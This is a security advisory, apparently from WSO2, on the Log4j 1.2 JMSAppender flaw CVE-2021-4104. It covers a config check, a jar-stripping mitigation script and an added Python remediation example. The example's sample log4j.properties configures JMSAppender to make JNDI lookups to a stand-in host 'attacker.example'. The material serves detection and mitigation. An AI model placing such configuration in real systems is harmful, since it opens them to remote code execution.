WSO2 impacted: No
Evidence of compromise: No
Customer actions required: No
JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default.
Exploitation of CVE-2021-4104 requires the ability to modify the Log4j configuration files (log4j.xml or log4j.properties) and then restart the WSO2 product. That in turn requires access to the server's file system with write permission on the relevant product configuration files, a level of access that already amounts to control of the host. Therefore, it is unlikely that an external attacker could exploit CVE-2021-4104.
To check whether JMSAppender is referenced in any configuration file, run the following command from the product-home directory (without the quotes): "grep -R 'org\.apache\.log4j\.net\.JMSAppender'". A match in a log4j.properties or log4j.xml file means the appender is actually configured, which is the precondition for this issue.
If you want to remove JMSAppender from all Log4j version 1 dependencies found within WSO2 products, use the following mitigation steps.
- Ensure that you have "zip" and "unzip" commands installed on the server hosting the product.
- Use either of the following options:
- Option 1: Navigate to the product-home folder and run the following command (without quotes): "curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh | bash"
- Option 2 (lets you review the script before running it):
- Download the script from https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh
- Copy the script into the product-home
- Run the script from product-home, using the following command (without quotes): "bash JMSAppender-remover.sh"
- After executing the above script, restart the product.
The mitigation script removes "org/apache/log4j/net/JMSAppender.class" from every Log4j version 1 dependency found within the folder it is run from (and its sub-folders). After applying the fix, you can ignore the "ClassNotFoundException" for the "JMSAppender" class that may appear during product startup; it is raised only if a configuration file still references the removed class.
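The following is an added example, not WSO2's JMSAppender-remover.sh and not part of the original announcement. It shows in Python what the check above and the mitigation script do: it scans a product tree for Log4j 1.x configuration that wires up JMSAppender (reporting the JNDI-related settings named in the description of CVE-2021-4104) and strips org/apache/log4j/net/JMSAppender.class from any jar that still carries it. The directory layout, the log4j.properties content and the stub jar are constructed for the demonstration; the stub jar contains placeholder bytes, not real bytecode.

```python
"""Added example: find and strip JMSAppender from a Log4j 1.x product tree.
Everything under build_sample_tree() is constructed sample data."""
import os
import shutil
import tempfile
import zipfile

JMS_CLASS_ENTRY = "org/apache/log4j/net/JMSAppender.class"
JMS_CLASS_NAME = "org.apache.log4j.net.JMSAppender"
# JMSAppender settings that control where its JNDI lookups go.
JNDI_KEYS = ("TopicBindingName", "TopicConnectionFactoryBindingName",
             "InitialContextFactoryName", "ProviderURL")


def find_jms_appender_config(root):
    """Return [(path, line_no, line)] for every .properties/.xml file under
    root that names JMSAppender, including its JNDI-related settings."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith((".properties", ".xml")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                lines = fh.read().splitlines()
            if not any(JMS_CLASS_NAME in ln for ln in lines):
                continue  # JMSAppender is not configured in this file
            for no, ln in enumerate(lines, 1):
                if JMS_CLASS_NAME in ln or any(k in ln for k in JNDI_KEYS):
                    hits.append((path, no, ln))
    return hits


def jar_entries(jar_path):
    """Entry names inside a jar (a jar is a zip file)."""
    with zipfile.ZipFile(jar_path) as zf:
        return zf.namelist()


def jars_with_jms_appender(root):
    """Paths of .jar files under root that still contain the JMSAppender class."""
    found = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".jar"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if JMS_CLASS_ENTRY in jar_entries(path):
                    found.append(path)
            except zipfile.BadZipFile:
                pass  # not a valid jar; skip instead of aborting the scan
    return found


def remove_entry_from_jar(jar_path, entry=JMS_CLASS_ENTRY):
    """Rewrite jar_path without `entry`. zipfile cannot delete in place, so the
    jar is rebuilt into a temp file next to it and then moved over the original.
    Returns True if the entry was present and removed, False otherwise."""
    with zipfile.ZipFile(jar_path) as src:
        if entry not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(jar_path) or ".", suffix=".tmp")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename == entry:
                    continue
                dst.writestr(info, src.read(info.filename))  # keeps compression type
    shutil.copymode(jar_path, tmp)  # preserve the original file permissions
    os.replace(tmp, jar_path)
    return True


def remediate(root):
    """Report JMSAppender configuration and strip the class from all jars."""
    hits = find_jms_appender_config(root)
    fixed = [j for j in jars_with_jms_appender(root) if remove_entry_from_jar(j)]
    return hits, fixed


def build_sample_tree(root):
    """Constructed product-home: a log4j.properties that configures JMSAppender
    with JNDI names, plus a stub log4j-1.2.17.jar that carries the class entry."""
    conf = os.path.join(root, "repository", "conf")
    lib = os.path.join(root, "repository", "components", "plugins")
    os.makedirs(conf)
    os.makedirs(lib)
    with open(os.path.join(conf, "log4j.properties"), "w", encoding="utf-8") as fh:
        fh.write("log4j.rootLogger=INFO, CARBON_CONSOLE, jms\n"
                 "log4j.appender.CARBON_CONSOLE=org.apache.log4j.ConsoleAppender\n"
                 "log4j.appender.jms=org.apache.log4j.net.JMSAppender\n"
                 "log4j.appender.jms.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory\n"
                 "log4j.appender.jms.ProviderURL=ldap://attacker.example:1389/\n"
                 "log4j.appender.jms.TopicBindingName=Exploit\n"
                 "log4j.appender.jms.TopicConnectionFactoryBindingName=Exploit\n")
    jar = os.path.join(lib, "log4j-1.2.17.jar")
    with zipfile.ZipFile(jar, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(JMS_CLASS_ENTRY, b"\xca\xfe\xba\xbe stub")          # placeholder
        zf.writestr("org/apache/log4j/Logger.class", b"\xca\xfe\xba\xbe stub")
    return jar


def demo():
    """Run the scan and strip against the constructed tree; return the results."""
    root = tempfile.mkdtemp(prefix="wso2-jms-")
    try:
        jar = build_sample_tree(root)
        hits, fixed = remediate(root)
        return {
            "config_hits": [(os.path.basename(p), no, ln) for p, no, ln in hits],
            "jars_fixed": [os.path.basename(j) for j in fixed],
            "jars_left": jars_with_jms_appender(root),
            "entries_after": sorted(jar_entries(jar)),
            "second_pass": remove_entry_from_jar(jar),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it against a real product-home by calling remediate(path) instead of demo(); the config hits tell you which file still references the appender, so that the ClassNotFoundException mentioned above does not appear after the class has been stripped.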
If you are using Docker images in your deployment, build a new image that runs the provided script as an additional build step, rather than patching running containers.
Example Dockerfile for Ubuntu based distributions:

    FROM wso2/wso2is:5.10.0
    USER root
    RUN \
        apt-get update \
        && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \
        zip \
        && rm -rf /var/lib/apt/lists/*
    USER wso2carbon
    RUN curl https://raw.githubusercontent.com/wso2/security-tools/master/internal/update-scripts/JMSAppender-remover.sh | bash
We will update this announcement if further actions are required.